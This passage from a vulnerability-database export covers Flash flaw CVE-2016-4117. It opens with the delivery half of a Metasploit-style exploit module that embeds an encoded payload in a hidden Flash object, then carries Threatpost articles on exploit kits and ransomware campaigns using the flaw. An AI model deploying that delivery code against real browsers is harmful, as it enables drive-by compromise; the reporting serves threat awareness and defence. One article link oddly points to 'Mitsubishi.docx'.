'swf' \nprint_status('Sending SWF...') \nsend_response(cli, @swf, 'Content-Type' => 'application/x-shockwave-flash', 'Cache-Control' => 'no-cache, no-store', 'Pragma' => 'no-cache') \nreturn \nend \n \nprint_status('Sending HTML...') \nsend_exploit_html(cli, exploit_template(cli, target_info), 'Pragma' => 'no-cache') \nend \n \ndef exploit_template(cli, target_info) \nswf_random = \"#{rand_text_alpha(3..7)}.swf\" \ntarget_payload = get_payload(cli, target_info) \nb64_payload = Rex::Text.encode_base64(target_payload) \n \nif target.name.include? 'osx' \nplatform_id = 'osx' \nend \nhtml_template = %(<html> \n<body> \n<object classid=\"clsid:d27cdb6e-ae6d-11cf-96b8-444553540000\" codebase=\"http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab\" width=\"1\" height=\"1\" /> \n<param name=\"movie\" value=\"<%=swf_random%>\" /> \n<param name=\"allowScriptAccess\" value=\"always\" /> \n<param name=\"FlashVars\" value=\"sh=<%=b64_payload%>&pl=<%=platform_id%>\" /> \n<param name=\"Play\" value=\"true\" /> \n<embed type=\"application/x-shockwave-flash\" width=\"1\" height=\"1\" src=\"<%=swf_random%>\" allowScriptAccess=\"always\" FlashVars=\"sh=<%=b64_payload%>&pl=<%=platform_id%>\" Play=\"true\"/> \n</object> \n</body> \n</html> \n) \n \nreturn html_template, binding \nend \n \ndef create_swf \npath = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2016-4117', 'msf.swf') \nFile.binread(path) \nend \nend \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/151589/adobe_flash_delete_range_tl_op.rb.txt", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "threatpost": [{"lastseen": "2018-10-06T22:55:13", "description": "Crooks behind the revamped CryptXXX 3.100 ransomware have switched its distribution from the Angler Exploit Kit to the Neutrino Exploit Kit. 
The sudden change in distribution was spotted on Monday by researchers at the SANS Internet Storm Center.\n\n\u201cThis is not the first time we\u2019ve seen campaigns associated with ransomware switch between Angler EK and Neutrino EK,\u201d wrote Brad Duncan, handler at SANS Internet Storm Center. But he said the switch was noteworthy because SANS had not yet seen CryptXXX distributed by Neutrino.\n\nThe move comes as security experts report a resurgence of the CryptXXX ransomware that [was recently revamped](<https://threatpost.com/updated-cryptxxx-ransomware-big-money-potential/118464/>) with new encryption algorithm and a new StillerX credential-stealing module that gives attackers additional capabilities to monetize an attack.\n\nDuncan said groups behind Angler have dropped CryptXXX like a rock, for now. Over the past few days, he hasn\u2019t tracked any Angler samples that contain the CryptXXX payload.\n\nThe Neutrino EK is characterized by its targeting of the Java runtime environment including versions of Java. \u201cLast month, Neutrino EK was documented using Flash exploits based on [CVE-2016-4117](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-4117>) effective against Adobe Flash Player up to version 21.0.0.213,\u201d Duncan wrote.\n\nThe Angler EK typically seeks to attack computers by exploiting Java and Flash Player vulnerabilities as well as the Microsoft Silverlight plugin.\n\nAccording to Duncan, on Monday he observed the [pseudo-Darkleech campaign](<Mitsubishi.docx>) began using Neutrino EK to send CryptXXX ransomware. On Tuesday, Duncan reported an even more virulent form of the attacks, finding a website with an injected script for both the pseudo-Darkleech campaign and the [EITest campaign](<http://researchcenter.paloaltonetworks.com/2016/03/unit42-how-the-eltest-campaigns-path-to-angler-ek-evolved-over-time/>). 
In both instances, infected sites were distributing the CryptXXX ransomware as a DLL file named either 2016-06-07-EITest-Neutrino-EK-payload-CryptXXX.dll or 2016-06-07-pseudoDarkleech-Neutrino-EK-payload-CryptXXX.dll.\n\n\u201cI was able to generate traffic for each campaign, but I had to use two separate visits, because the pseudo-Darkleech script prevented the EITest script from generating any EK traffic,\u201d Duncan wrote in a technical [write-up of his findings](<https://isc.sans.edu/forums/diary/Neutrino+EK+and+CryptXXX/21141/>).\n\nDuncan said while Neutrino EK traffic patterns have remained consistent, the only change of note is now the EK sticks to TCP port 80.\n", "cvss3": {}, "published": "2016-06-09T08:43:57", "type": "threatpost", "title": "CryptXXX Jumps From Angler to Neutrino Exploit Kit", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2016-4117"], "modified": "2016-06-09T12:43:57", "id": "THREATPOST:D2016D9CC965B5E2634C0B28064F12A0", "href": "https://threatpost.com/cryptxxx-ransomware-jumps-from-angler-to-neutrino-exploit-kit/118570/", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:55:17", "description": "**Update **Exploits for the most recent [Adobe Flash Player zero-day vulnerability](<https://threatpost.com/emergency-flash-update-patches-public-zero-day/118055/>) have been integrated into the Angler, Neutrino and Magnitude exploit kits, and are leading compromised computers to different ransomware strains, banking malware, and a credential-stealing Trojan.\n\nA French researcher who goes by the handle Kafeine told Threatpost that Neutrino has embedded a [working exploit](<http://malware.dontneedcoffee.com/2016/05/cve-2016-4117-flash-up-to-2100213-and.html>) for CVE-2016-4117 while Magnitude has not fully implemented the exploit.\n\nKafeine this morning also confirmed that the Angler Exploit Kit has now integrated the same Flash zero day exploit. 
The Angler exploits, however, are dropping the Dridex banking Trojan. Dridex has primarily spread in spam and phishing emails, and used malicious macros embedded in Office documents to download the Trojan.\n\nKafeine said that Magnitude is firing exploits for Flash Player up to version 21.0.0.213, but the payloads are not executing, despite the presence of references to the vulnerable code. It could be that the exploit was not implemented correctly; Kafeine said that as of this morning the payloads were not working.\n\nDetection rates on VirusTotal for the Neutrino exploit [remains low](<https://www.virustotal.com/en/file/f5cea58952ff30e9bd2a935f5843d15952b4cf85cdd1ad5d01c8de2000c48b0a/analysis/>), only five of 56 as of this morning.\n\nThe Flash Player type-confusion zero-day vulnerability was patched on May 12 in an [emergency update](<https://helpx.adobe.com/security/products/flash-player/apsb16-15.html>). Researchers at FireEye said they were [aware of the existence of exploits](<https://www.fireeye.com/blog/threat-research/2016/05/cve-2016-4117-flash-zero-day.html>) for the flaw on May 8, which Adobe patched in short order.\n\nKafeine said today that in different passes with the exploit kit, he saw infection payloads that included CryptXXX, Cerber and DMA Locker ransomware, as well as the Gootkit Trojan.\n\nGootkit has also been [integrated into the Angler Exploit Kit](<http://www.cyphort.com/angler-ek-leads-to-fileless-gootkit/>). Researchers at Cyphort said malvertising attacks were redirecting victims to Angler, which then downloads Bedep click-fraud malware and the Gootkit loader. Gootkit, which used primarily to steal online banking credentials, is loaded into memory and leaves no files on the victims\u2019 machines.\n\nOne day after the emergency Flash update, FireEye published details on the attacks it discovered and privately disclosed to Adobe. 
In its report, FireEye said exploits were embedded in Office documents hosted on the attackers\u2019 site, and a dynamic DNS domain was used to reference the document and payload. This allowed the attacks to spread via URL or email attachments.\n\nFireEye said that the attacks worked against machines running Flash 21.0.0.196 and above; the exploits run shellcode, which downloads and executes a second shellcode that downloads and executes the malware and displays a decoy document to the victim. The malware also opens a backdoor and is capable of receiving new commands from the attackers.\n\nThe Magnitude EK, meanwhile, has been pushing Cerber ransomware almost exclusively. Researchers at Proofpoint discovered a [previous Adobe Flash zero day](<https://threatpost.com/latest-flash-zero-day-being-used-to-push-ransomware/117248/>) a month earlier was integrated into Magnitude and Nuclear exploit kits. Nuclear was moving Locky ransomware onto victims\u2019 machines; Locky was blamed for a number of high-profile infections at hospitals nationwide.\n\nCerber has been climbing the ranks of ransomware\u2014along with CryptXXX\u2014after FireEye said attackers have been leveraging the [same spam infrastructure](<https://threatpost.com/cerber-ransomware-on-the-rise-fueled-by-dridex-botnets/118090/>) used to spread the dangerous Dridex banking malware. Cerber has an annoying feature in which it uses text-to-speech technology to audibly read its ransom note to its victims.\n\n_This article was updated May 23 to reflect the addition of the Flash zero day into the Angler Exploit Kit. 
_\n", "cvss3": {}, "published": "2016-05-23T10:04:52", "type": "threatpost", "title": "Exploit Kits Attacking Adobe Flash Player Zero Day", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2016-4117"], "modified": "2016-05-23T21:34:40", "id": "THREATPOST:8D1613F1DDC8479184A4F8C93BA951EF", "href": "https://threatpost.com/two-exploit-kits-spreading-attacks-for-recent-flash-player-zero-day/118236/", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:55:21", "description": "As promised earlier this week, Adobe today released an updated version of Flash Player that includes a [patch for a zero-day vulnerability](<https://helpx.adobe.com/security/products/flash-player/apsb16-15.html>).\n\nAdobe said it is aware of the existence of a public exploit for CVE-2016-4117, but said the flaw has not been publicly attacked.\n\nThe vulnerability affects Flash Player versions 21.0.0.226 and earlier on Windows, Mac OS X, Linux and Chrome OS.\n\n\u201cSuccessful exploitation could cause a crash and potentially allow an attacker to take control of the affected system,\u201d Adobe said Tuesday in an [advisory](<https://helpx.adobe.com/security/products/flash-player/apsa16-02.html>).\n\nAdobe patched the zero day on the Desktop and Extended Support releases of Flash Player, as well as for Google Chrome and Microsoft Edge and Internet Explorer 11 browsers; all of which were given the most critical severity rating.\n\nThe zero day is a type confusion vulnerability and it exposes the underlying operating system to remote code execution. Researcher Genwei Jiang of FireEye is credited with privately disclosing the issue to Adobe.\n\nThe update patches 25 vulnerabilities in total, two of which are type confusion flaws, including the zero day. 
A dozen memory corruption vulnerabilities were addressed that also lead to remote code execution, along with eight use-after-free flaws also exposing systems to remote code execution.\n\nAdobe also patched buffer overflow and heap buffer overflow flaws, as well as a vulnerability in the directory search path, that allow remote code execution.\n\nOn Tuesday, Adobe gave advanced notification of the zero day and said it would have an update ready by today. It also released [updated versions of Adobe Acrobat, Adobe Reader and ColdFusion](<https://threatpost.com/adobe-warns-of-flash-zero-day-patches-acrobat-reader/117981/>), patching 95 vulnerabilities.\n\nToday\u2019s is the second emergency update to Adobe Flash Player in a little more than a month. On April 7, a zero day was patched in Flash after [attacks were discovered in two exploit kits](<https://threatpost.com/latest-flash-zero-day-being-used-to-push-ransomware/117248/>) that were pushing ransomware onto compromised machines.\n\nAttackers used the previously unpatched flaw in Flash to infect victims with either Locky or Cerber ransomware. Until then, Locky spread primarily via spam with attachments enticing users to enable macros in Word documents that download the malware onto machines. 
Cerber is also crypto-ransomware that includes a feature where the infected machine will speak to the victim via a text-to-speech engine.\n", "cvss3": {}, "published": "2016-05-12T12:55:08", "type": "threatpost", "title": "Adobe Emergency Update Patches Flash Zero Day", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2016-4117"], "modified": "2016-05-19T19:03:18", "id": "THREATPOST:57A3C5842284FA1358A0BA67A4DECF7D", "href": "https://threatpost.com/emergency-flash-update-patches-public-zero-day/118055/", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:55:21", "description": "Adobe rolled out security updates for three of its products on Tuesday, including 95 fixes it pushed for Acrobat, Reader, and ColdFusion.\n\nUsers will have to wait until later this week, however, to patch [a critical vulnerability that exists in Flash Player](<https://helpx.adobe.com/security/products/flash-player/apsa16-02.html>). It may only be a matter of time until the vulnerability is publicly exploited; Adobe claims that it isn\u2019t aware of any active exploits for the issue but is aware of a report that an exploit for the vulnerability, CVE-2016-4117, exists in the wild.\n\nThe zero day, dug up by Genwei Jiang, a researcher at FireEye, exists in Flash 21.0.0.226 and earlier versions for Windows, Mac, Linux, and Chrome OS, Adobe warned Tuesday. If exploited, the vulnerability could cause a crash and let an attacker take control of the system. 
A fix for the issue was not ready in time to ship with this week\u2019s Patch Tuesday patches but the company claims it is planning to address the issue later in the week, potentially as early as Thursday.\n\nAs far as today\u2019s patches go, 92 of the 95 issues that were fixed, address [vulnerabilities in either Acrobat and Reader](<https://helpx.adobe.com/security/products/acrobat/apsb16-14.html>), the bulk of which were use-after-free vulnerabilities or memory corruption vulnerabilities that could lead to code execution, Adobe warns.\n\nA handful of other vulnerabilities fixed on Tuesday, including issues in the directory search path, an integer overflow vulnerability, and heap buffer overflow vulnerabilities, could also lead to code execution. Other vulnerabilities could lead to information disclosure, memory leak, or the bypassing of restrictions on Javascript API execution.\n\nWhile none of the Reader or Acrobat vulnerabilities are being exploited in the wild to Adobe\u2019s knowledge, the company has still branded them critical, because they could enable an attacker to take control of a system.\n\nThree vulnerabilities [were fixed in ColdFusion](<https://helpx.adobe.com/security/products/coldfusion/apsb16-16.html>), including hotfixes for version 10, 11, and the 2016 release. 
The fixes address an input validation issue that could lead to cross-site scripting (XSS) attacks, a host name verification problem with wildcard certificates, and an Apache Commons library update to mitigate Java deserialization vulnerabilities.\n\nThe 95 patches mark a serious uptick from the last time Adobe updated Acrobat and Reader; when it released updates in March it only patched three CVEs combined between the two products.\n\nThe company was forced to issue [an emergency update for Flash](<https://threatpost.com/emergency-update-coming-for-flash-vulnerability-under-attack/117219/>) last month after a vulnerability in version 21.0.0.197 was discovered and eventually rolled into [two exploit kits](<https://threatpost.com/latest-flash-zero-day-being-used-to-push-ransomware/117248/>) and used to peddle ransomware.\n", "cvss3": {}, "published": "2016-05-10T13:56:58", "type": "threatpost", "title": "Adobe Patches 95 Vulnerabilities in Acrobat, Reader, Warns of Flash Zero Day", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2016-4117"], "modified": "2016-05-10T17:56:58", "id": "THREATPOST:11EA26F57D7D2191ABB8BCEDAE972C5B", "href": "https://threatpost.com/adobe-warns-of-flash-zero-day-patches-acrobat-reader/117981/", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:55:10", "description": "Adobe on Thursday patched a zero-day vulnerability in [Flash Player](<https://helpx.adobe.com/security/products/flash-player/apsb16-18.html>) that has been used in targeted attacks carried out by a new APT group operating primarily against high-profile victims in Russia and Asia.\n\nResearchers at Kaspersky Lab [privately disclosed the flaw to Adobe](<https://threatpost.com/fix-coming-for-flash-vulnerability-under-attack/118652/>) after exploits against the zero-day were used in March by the [ScarCruft APT](<https://securelist.com/blog/research/75082/cve-2016-4171-adobe-flash-zero-day-used-in-targeted-attacks/>) gang 
in what Kaspersky Lab is calling [Operation Daybreak](<https://securelist.com/blog/research/75100/operation-daybreak/>).\n\nResearchers said the group has a number of operations under way and that it has two Flash exploits and another against Microsoft\u2019s Internet Explorer at its disposal. Kaspersky speculates that this group could also be behind another zero-day, [CVE-2016-0147](<https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-0147>), a vulnerability in Microsoft XML Core Services that was patched in April.\n\nIn a report from Kaspersky Lab, researchers said the vulnerability is in Flash code that parses ExecPolicy metadata. ScarCruft\u2019s exploit implements read/write operations at a particular address in memory that can allow for full remote code execution. Full details are explained in the Kaspersky Lab report published today.\n\nThe attack happens in stages starting with shellcode downloading and executing a malicious DLL that loads in Flash and also includes a technique designed to bypass antivirus detection using the Windows DDE component, or Dynamic Data Exchange, a protocol that facilitates data transfers between applications.\n\nKaspersky researchers said this part of the attack makes \u201cclever\u201d use of Windows DDE.\n\n\u201cThe main idea here is that if you create a LNK to an executable or command, then use the ShowGroup method, the program will be executed,\u201d Kaspersky Lab said in its report. 
\u201cThis is an undocumented behavior in Microsoft Windows.\u201d\n\nKaspersky\u2019s research indicates there have been more than two dozen Operation Daybreak victims to date, including an Asian law enforcement agency, a large Asian trading company, an American mobile advertising company and individuals affiliated with the International Association of Athletics Federations (IAAF), some of which were compromised in the past few days.\n\nAttacks start with spear-phishing emails that include a link to a website hosting an exploit kit associated with ScarCruft and used in other attacks. The exploit kit eventually redirects victims\u2019 browsers to a server in Poland controlled by the attackers.\n\n\u201cThe ScarCruft APT group is a relatively new player and managed to stay under the radar for some time,\u201d researchers wrote. \u201cIn general, their work is very professional and focused. Their tools and techniques are well above the average.\u201d\n\nAnother set of attacks called Operation Erebus leverages another Flash exploit, [CVE-2016-4117](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-4117>), and relies on watering hole attacks as a means of propagation. [Watering hole attacks](<https://threatpost.com/why-watering-hole-attacks-work-032013/77647/>) involved compromising a site frequented by the target and serving exploits to site visitors that redirects to malware, often spy tools.\n\nAdobe has implemented a number of mitigations in Flash that defend against memory-based attacks in particular that also make zero days incrementally difficult. While Adobe and outside researchers continue to find and patch critical issues in Flash Player, publicly attacks against unknown Flash flaws are much less frequent.\n\n\u201cNowadays, in-the-wild Flash Player exploits are becoming rare. This is because in most cases they need to be coupled with a Sandbox bypass exploit, which makes them rather tricky. 
Additionally, Adobe has been doing a great job at implementing new mitigations to make exploitation of Flash Player more and more difficult,\u201d Kaspersky researchers wrote. \u201cNevertheless, resourceful threat actors such as ScarCruft will probably continue to deploy zero-day exploits against their high profile targets.\u201d\n\nGoogle Project Zero team researcher Natalie Silvanovich said that efforts by Adobe to introduce new exploit mitigations into the Flash Player code base have slowed down exploit development and made it more difficult for researchers looking for bugs.\n\nDuring the Infiltrate Conference in Miami in April, Silvanovich said during a presentation that, for example, use-after-free bugs are more difficult to exploit and that other classes of vulnerabilities such as redefinition bugs may be going away. She added that information garnered from the Hacking Team data breach last summer was also important to her work. \u201cThe Hacking Team dump was an unprecedented source of information on how Flash exploits work in the wild,\u201d she said during her talk.\n\nThursday\u2019s Flash Player update patched 36 vulnerabilities in total including the zero day CVE-2016-4171. Desktop versions 21.0.0.242 and earlier on Windows and Mac machines are affected and users should upgrade to 22.0.0.192.\n\nThe majority of the vulnerabilities patched today are memory corruption flaws. 
The update also takes care of type-confusion, use-after-free, buffer overflow and directory search path vulnerabilities as well a same-origin policy bypass flaw that exposes machines to information disclosure attacks.\n", "cvss3": {}, "published": "2016-06-17T06:00:38", "type": "threatpost", "title": "Adobe Patches Flash Zero Day Under Attack by APT Group", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2016-0147", "CVE-2016-4117", "CVE-2016-4171"], "modified": "2016-06-20T17:57:07", "id": "THREATPOST:65788483E3FE6F5E155BBFDFEB0DB640", "href": "https://threatpost.com/scarcruft-apt-group-used-latest-flash-zero-day-in-two-dozen-attacks/118642/", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:53:29", "description": "A ransomware attack that closed off access to personal and shared drives at University College London last week has been linked to a malvertising campaign spreading Mole, a variant of CryptoMix ransomware.\n\nKafeine, a white-hat who works for Proofpoint and is known for his research into exploit kits, said in a [report](<https://www.proofpoint.com/us/threat-insight/post/adgholas-malvertising-campaign-using-astrum-ek-deliver-mole-ransomware>) published today that the group behind AdGholas is responsible. AdGholas are well known malvertising purveyors who have [used steganography in the past to conceal attacks](<https://threatpost.com/adgholas-malvertising-campaign-leveraged-steganography-filtering/119571/>). In this case, the attacks used the Astrum Exploit Kit to spread the malware.\n\nUniversity College London, meanwhile, said today that [all services have been returned to normal](<http://www.ucl.ac.uk/isd/news/isd-news/jun2017/ucl-wide-ransomware-attack-14062017>). 
As of Friday, personal storage and shared drives had been restored, and yesterday, write-access to the remaining shared drives was also restored.\n\nThe infection, the university said, was contained by last Thursday and that it was continuing to look into the root cause. Initially, officials said the attack started with a phishing email, but later reversed course and said the attack was web-based. Officials also said that services should be able to be restored from backup, sparing them the need to pay a ransom.\n\nA dozen local and shared drives were infected, and the school initially called it a \u201czero-day attack.\u201d\n\n\u201cOur antivirus software is up to date and we are working with anti-virus suppliers to pass on details of the infection so that they are aware of the incident,\u201d officials said last week. \u201cWe cannot currently confirm the ransomware that was deployed.\u201d\n\nProofpoint said AdGholas\u2019 use of ransomware in this attack is a departure from its normal tactic of spreading banking malware. Kafeine said the attack went beyond just UCL to other high-profile sites.\n\nAfter ruling out other exploit kits and ransomware based on available forensics, Proofpoint investigated the possibility of the involvement of AdGholas and its use of Astrum to spread malware. One of the IP addresses found in the attack was a Mole command and control server; some malware samples contacting this IP had been submitted to VirusTotal and were consistent with a known Astrum payload.\n\n\u201cAt that stage, we were almost convinced the events were tied to AdGholas/Astrum EK activity,\u201d Kafeine wrote. 
\u201cWe confirmed this, however, via an HTTPS connection common to the compromised host avia-book[.]com.\u201d\n\nThe compromised domain was used in a number of malvertising campaigns across Europe and Asia, and Kafeine said all the compromised hosts also contacted the current Astrum command and control IP address, which offers full HTTPS support, Proofpoint said.\n\n\u201cAstrum tried HTTPS between March 30 and April 4, 2017, before adopting it permanently at the end of May,\u201d Kafeine said, identifying a number of vulnerabilities exploited by the kit: CVE-2016-0189, CVE-2016-1019, and CVE-2016-4117. \u201cThe introduction of Diffie-Hellman suggests that there might be a new exploit the actors are trying to hide in this chain. Obtaining the patch state of the compromised hosts would help rule out this possibility.\u201d\n\nThe exploit kit was spreading Mole ransomware on two days, June 14 and 15, in the U.K. and United States, while continuing to spread banking malware elsewhere.\n\nMole encrypts files and demands 0.5 Bitcoin to receive a decryption key that unlocks scrambled data.\n\n\u201c[AdGholas malvertising](<https://threatpost.com/microsoft-shuts-down-zero-day-used-in-adgholas-malvertising-campaigns/120618/>) redirecting to the Astrum Exploit Kit is the most evolved blind mass infection chain known today,\u201d Kafeine wrote. 
\u201cFull HTTPS, heavy smart filtering, domain shadowing, Diffie-Hellman, and perfect knowledge of how the advertising industry operates allow these threat actors to lure large agencies to bring them high volumes of traffic from high-value website and targets.\u201d\n", "cvss3": {}, "published": "2017-06-20T14:27:43", "type": "threatpost", "title": "UCL Ransomware Linked to AdGholas Malvertising Group", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2016-0189", "CVE-2016-1019", "CVE-2016-4117"], "modified": "2017-06-20T18:27:43", "id": "THREATPOST:804E5F87A8DDC6B4C06A66CEE9F86A32", "href": "https://threatpost.com/university-college-london-ransomware-linked-to-adgholas-malvertising-group/126405/", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:54:43", "description": "When an exploit kit fades away, it usually doesn\u2019t take long for another to take its place in the limelight, especially when the kit is an integral part of the ransomware ecosystem.\n\nThat\u2019s exactly what\u2019s happened over the past few weeks as researchers say they\u2019ve seen an uptick in RIG Exploit Kit traffic used to peddle CrypMIC ransomware.\n\nThe news comes two weeks [after researchers shut down a global malvertising campaign](<https://threatpost.com/malvertising-campaign-pushing-neutrino-exploit-kit-shut-down/120322/>) that was delivering the same ransomware but via the Neutrino Exploit Kit. 
While RIG is far from new \u2013 it was pushing Cryptowall ransomware on victims [as far back as 2014](<https://threatpost.com/rig-exploit-kit-pushing-cryptowall-ransomware/106540/>) \u2013 it has enjoyed a spike in the days following Neutrino\u2019s decline, researchers say.\n\nAccording to experts at Heimdal Security, who have tracked the kit\u2019s traffic over the past 20 days, it\u2019s [picking up where Neutrino left off](<https://heimdalsecurity.com/blog/security-alert-rig-exploit-kit-crypmic-ransomware/>). A new campaign is using script injection to compromise legitimate websites and redirect victims to hijacked domains pushing CrypMIC. Andra Zaharia, a security evangelist with the Danish firm, said some attacks are using malicious iFrame HTML code as the injects.\n\nRIG is using a technique previously utilized by the Angler Exploit Kit, [domain shadowing](<https://threatpost.com/domain-shadowing-latest-angler-exploit-kit-evasion-technique/111396/>), to redirect users. Attackers use stolen domain credentials to set up subdomains to divert traffic to the arbitrary sites. Domain owners are often none the wiser because many neglect to monitor their login credentials and fail to notice after they\u2019ve been compromised in a phishing attack.\n\nAccording to Zaharia, the new campaign bears a resemblance to [Pseudo-Darkleech](<https://threatpost.com/the-changing-face-of-pseudo-darkleech/119036/>), a campaign that\u2019s been used for more than a year now to deliver exploit kits. Both campaigns use similar patterns when it comes to injecting malicious scripts and redirecting traffic to the exploit kit infrastructure, Zaharia said.\n\nResearchers with Cisco Talos, who took down the Neutrino-CrypMIC campaign 20 days ago, believe it exposed roughly one million users to malicious ads for the two weeks they followed it in early August. 
The researchers worked with GoDaddy to subsequently shut down domains that were being used by the campaign to redirect traffic to a server hosting Neutrino in Russia.\n\nThe RIG-CrypMIC campaign takes advantage of recent vulnerabilities in Adobe Flash Player, according to Heimdal. Following the exploit, CrypMIC is dropped into a Windows temporary folder with a random name. From there, the malware connects to a command and control server.\n\nWhile Zaharia told Threatpost they don\u2019t have the traffic numbers in full, she did confirm the payload\u2019s delivery efficiency is at 35.6 percent, spread out across different Flash exploits.\n\nThe exploits include CVE-2015-8651, a vulnerability that Adobe patched last December, and CVE-2016-4117, a zero day vulnerability [the company patched in May](<https://threatpost.com/emergency-flash-update-patches-public-zero-day/118055/>). Attackers embedded CVE-2016-4117 into Neutrino a week after it was patched by the company, and the ScarCruft APT gang, a group that was spotted targeting Russia, Nepal, and South Korea, also leveraged the exploit. According to researchers at Kaspersky Lab, who identified the group in June, ScarCruft paired the exploit with watering hole attacks as part of [Operation Erebus](<https://threatpost.com/scarcruft-apt-group-used-latest-flash-zero-day-in-two-dozen-attacks/118642/>), a series of attacks carried out in spring.\n\nThe campaign also uses CVE-2016-0189, an Internet Explorer zero day that Microsoft patched in May, to carry out attacks. Developers behind Neutrino [incorporated that vulnerability into the exploit kit in July](<https://threatpost.com/patched-ie-zero-day-incorporated-into-neutrino-ek/119321/>).\n\nThe moves are positioning RIG to be the definitive exploit kit, for now at least, Zaharia said.\n\n\u201cWhen it comes to exploit kits, the dynamic is incredibly fast-moving. 
In the past month, two of the biggest exploit kit infrastructures were either taken down or suffered a big hit, so one of the other notorious exploit kits is bound to take advantage of the opportunity,\u201d Zaharia told Threatpost Wednesday. \u201cRIG is shaping up to be the go-to EK, but Magnitude, Sundown or others could also be working on their next big move.\u201d\n", "cvss3": {}, "published": "2016-09-21T09:29:38", "type": "threatpost", "title": "Picking Up Where Neutrino Left Off: RIG Pushing CrypMIC Ransomware", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2015-8651", "CVE-2016-0189", "CVE-2016-4117"], "modified": "2016-09-21T13:29:38", "id": "THREATPOST:7FB17A328D8323E9E6A2DEBE58409A4D", "href": "https://threatpost.com/rig-picks-up-where-neutrino-left-off-pushes-crypmic-ransomware/120735/", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:54:23", "description": "A nasty Adobe Flash zero-day vulnerability that was remediated in an [emergency update in October 2015](<https://threatpost.com/emergency-adobe-flash-zero-day-patch-arrives-ahead-of-schedule/115073/>) was thereafter co-opted by seven exploit kits, according to an analysis published today by researchers at Recorded Future.\n\nThe Adobe vulnerability, CVE-2015-7645, was also used by the Russian APT group known as APT 28, which laced spear phishing emails with exploits targeting foreign affairs ministries worldwide. APT 28, also known as Sofacy, frequently targets NATO-allied political targets and in November was [singled out by Microsoft](<https://threatpost.com/microsoft-says-russian-apt-group-behind-zero-day-attacks/121722/>) for using separate Flash and Windows zero days in targeted attacks this year.\n\nThe Flash bug was among the first to be used after Adobe implemented new mitigations into the software to combat memory-based attacks. 
Despite the improvements in Flash security, attackers still take a shine to these exploits.\n\nRecorded Future\u2019s report \u201c[New Kit, Same Player](<https://www.recordedfuture.com/top-vulnerabilities-2016/>)\u201d says that six of the top 10 vulnerabilities used in exploit kits were Flash Player bugs, followed by Internet Explorer, Windows and Silverlight exploits. None of this year\u2019s top 10 vulnerabilities were present in a similar analysis done last year.\n\nExploit kits, meanwhile, have been reduced in prominence since the disappearance of a number of popular kits, including Angler and Nuclear. Angler, in particular, was popular with criminals; it was updated frequently and sold in a number of underground forums. The June arrest of a Russian cybercrime outfit behind the Lurk Trojan, however, spelled the end of days for Angler. Researchers at Kaspersky Lab [confirmed the connection](<https://securelist.com/analysis/publications/75944/the-hunt-for-lurk/>) between the [Lurk gang and Angler](<https://threatpost.com/inside-the-demise-of-the-angler-exploit-kit/120222/>) distribution in an August report.\n\nNonetheless, exploit kits remain a threat and a vehicle for attacks that include ransomware, click fraud and adware. Victims are compromised in a number of ways, including drive-by attacks, malvertising or links in emails, all of which direct the victim\u2019s browser to the exploit kit\u2019s landing page. Code on the landing page determines the browser being used and launches the exploit most likely to hit paydirt.\n\nCVE-2015-7645 was found in Angler, as well as in Neutrino, Magnitude, RIG, Nuclear Pack, Spartan and Hunter. It, by far, had the highest penetration into exploit kits, according to Recorded Future.\n\nBut since Angler\u2019s demise earlier this year, Sundown has risen to a measure of prominence with its maintainers updating the kit often with new exploits. 
Sundown\u2019s payload, however, differs in that it drops banking Trojans on users\u2019 machines. Recorded Future said this kit also relies on domain shadowing more than its counterparts in order to register subdomains that are used to host attacks.\n\nSundown also contained CVE-2016-0189, an [Internet Explorer bug](<https://threatpost.com/patched-ie-zero-day-incorporated-into-neutrino-ek/119321/>) used in targeted attacks against South Korean organizations earlier this year. Microsoft patched it in May, and by July it had been incorporated into Neutrino as well. The IE bug, Recorded Future said, was the top flaw found in exploit kits, referenced more than 600 times. CVE-2016-1019 and CVE-2016-4117, two Flash Player bugs, round out the top three. [CVE-2016-4117](<https://securelist.com/blog/research/75100/operation-daybreak/>) was used by the [ScarCruft APT group](<https://threatpost.com/scarcruft-apt-group-used-latest-flash-zero-day-in-two-dozen-attacks/118642/>), Kaspersky Lab researchers said in June, in watering hole attacks.\n", "cvss3": {}, "published": "2016-12-06T13:58:56", "type": "threatpost", "title": "Flash Exploit Found in Seven Exploit Kits", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2015-7645", "CVE-2016-0189", "CVE-2016-1019", "CVE-2016-4117"], "modified": "2016-12-07T14:36:02", "id": "THREATPOST:190D2D4CC706E0CF894B62979A2DA309", "href": 